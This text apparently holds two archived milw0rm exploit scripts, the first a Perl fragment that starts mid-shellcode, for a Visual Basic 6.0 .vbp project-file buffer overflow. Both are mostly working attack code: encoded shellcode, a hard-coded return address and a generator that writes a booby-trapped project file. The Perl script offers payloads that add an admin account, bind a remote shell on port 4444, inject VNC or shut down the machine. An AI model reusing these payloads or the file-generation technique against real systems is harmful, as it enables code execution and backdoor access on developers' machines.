"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". "\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x43\x4b\x38\x4e\x47". "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x51\x4b\x48". "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x48". "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c". "\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e". "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x38". "\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34". "\x4b\x38\x4f\x45\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x48". "\x41\x50\x4b\x4e\x49\x48\x4e\x35\x46\x32\x46\x50\x43\x4c\x41\x43". "\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x43\x45\x58\x42\x4c\x4a\x37". "\x4e\x50\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x57\x4e\x51\x4d\x4a". "\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x58\x42\x4b". "\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x45\x41\x53". "\x48\x4f\x42\x36\x48\x35\x49\x48\x4a\x4f\x43\x58\x42\x4c\x4b\x37". "\x42\x45\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x56\x4a\x39". "\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x37\x4a\x56". "\x45\x47\x46\x37\x46\x46\x4f\x36\x47\x37\x50\x46\x42\x42\x4d\x42". "\x43\x36\x42\x42\x44\x42\x4a\x34\x41\x54\x49\x34\x42\x42\x48\x35". "\x45\x34\x50\x56\x42\x33\x4d\x56\x42\x52\x42\x57\x47\x57\x50\x56". "\x43\x33\x46\x36\x42\x32\x4c\x46\x42\x33\x42\x33\x44\x37\x42\x32". "\x44\x46\x42\x53\x4a\x57\x42\x33\x44\x47\x42\x52\x47\x47\x49\x56". "\x48\x46\x42\x52\x4b\x56\x42\x33\x43\x57\x4a\x56\x41\x53\x42\x32". "\x45\x37\x42\x32\x44\x56\x41\x43\x46\x37\x43\x46\x4a\x56\x44\x32". "\x42\x30\x5a"; $endQuote = "\x22"; $i = $ARGV[0]; if ($i==1){ print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc1$endQuote$koshi"; exit; } if ($i==2){ print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc2$endQuote$koshi"; exit; } if ($i==3){ print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc3$endQuote$koshi"; exit; } if ($i==4){ print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc4$endQuote$koshi"; exit; } if ($i==5){ print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc5$endQuote$koshi"; exit; } print "\n"; print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"; print " +++ +++\n"; print " +++ +++\n"; print " +++ Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec +++\n"; print " +++ Written By Koshi +++\n"; print " +++ Greets: Rima my baby! Draven, thanks for helping. +++\n"; print " +++ +++\n"; print " +++ Usage Ex.: ./vb6.pl 1 >>Project1.vbp +++\n"; print " +++ +++\n"; print " +++ Options: +++\n"; print " +++ 1 - win32_exec CALC.EXE +++\n"; print " +++ 2 - win32_adduser Pass=4dmin User=koshi +++\n"; print " +++ 3 - win32_bind Port 4444 +++\n"; print " +++ 4 - win32_bind_vncinject Port 5900 +++\n"; print " +++ 5 - win32_exec shutdown -c \x22HAI VEn0m pw.. +++\n"; print " +++ +++\n"; print " +++ +++\n"; print " +++ Notes: Ship final .VBP file with a .FRM file to avoid +++\n"; print " +++ warnings in Visual Basic 6.0 +++\n"; print " +++ +++\n"; print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"; exit; #EOF # milw0rm.com [2007-09-04]

#usage: vbexploit.py FileName.vbp import sys print "--------------------------------------------------------------------------" print " [PoC_2] Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution " print " author: shinnai" print " mail: shinnai[at]autistici[dot]org" print " site: http://shinnai.altervista.org\n" print " based on Koshi exploit" print " http://www.milw0rm.com/exploits/4361\n" print " I try his exploit on Windows XP Pro SP2 Ita, full patched and it doesn't" print " work, but he said:\n" print ' "# ...backwards..if you don' + "'t" + ' know why, then gtfo."\n' print " ok, now I know why brotha, I got this exception:\n" print ' "Access violation when writing to [63636363]"\n' print " so I search another way to get exploit working but I need to do some" print ' changes to memory address ("00" became "20") and nop ("90" became "3F").' print " Well, here it is a PoC_2 and if it doesn't work and" + ' "you don' + "'t know why," print ' then"' + "... feel free to ask ;)\n" print " dedicated to all Italian vb6 programmers... be safe bros" print "--------------------------------------------------------------------------" buff = "A" * 494 EIP = "\x37\x17\x8B\x60"; #call ESP from VBSCC.DLL esp, you can (or must) change as you like buff2 = "A" * 12 RW_Memory = "\x20\x20\x01\x20" #patched writeable memory address "\x00\x00\x01\x00" nop = "\x3F\x3F\x3F\x3F" #patched nop "\x90" shellcode = \ "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+\ "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+\ "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+\ "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+\ "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"+\ "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"+\ "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"+\ "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"+\ "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"+\ "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+\ "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"+\ "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"+\ "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"+\ "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+\ "\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"+\ "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"+\ "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"+\ "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"+\ "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"+\ "\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"+\ "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"+\ "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a" try: vb_proj = \ 'Type=Exe\n'+\ 'Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\WINDOWS'+\ '\system32\stdole2.tlb#OLE Automation' + buff + EIP + buff2 + RW_Memory + nop + shellcode + nop +\ '\nStartup="Sub Main"\n'+\ 'Command32=""\n'+\ 'Name=' + sys.argv[1]+\ '\nHelpContextID="0"\n'+\ 'CompatibleMode="0"\n'+\ 'MajorVer=1\n'+\ 'MinorVer=0\n'+\ 'RevisionVer=0\n'+\ 'AutoIncrementVer=0\n'+\ 'ServerSupportFiles=0\n'+\ 'VersionCompanyName="xxx"\n'+\ 'CompilationType=0\n'+\ 'OptimizationType=0\n'+\ 'FavorPentiumPro(tm)=0\n'+\ 'CodeViewDebugInfo=0\n'+\ 'NoAliasing=0\n'+\ 'BoundsCheck=0\n'+\ 'OverflowCheck=0\n'+\ 'FlPointCheck=0\n'+\ 'FDIVCheck=0\n'+\ 'UnroundedFP=0\n'+\ 'StartMode=0\n'+\ 'Unattended=0\n'+\ 'Retained=0\n'+\ 'ThreadPerObject=0\n'+\ 'MaxNumberOfThreads=1\n\n'+\ '[MS Transaction Server]\n'+\ 'AutoRefresh=1' out_file = open(sys.argv[1],'w') out_file.write(vb_proj) out_file.close() print "\nFILE CREATION COMPLETED!\n" except: print " \n -------------------------------------" print " Usage: exploit.py FileName.vbp" print " -------------------------------------" print "\nAN ERROR OCCURS DURING FILE CREATION!" # milw0rm.com [2007-09-19]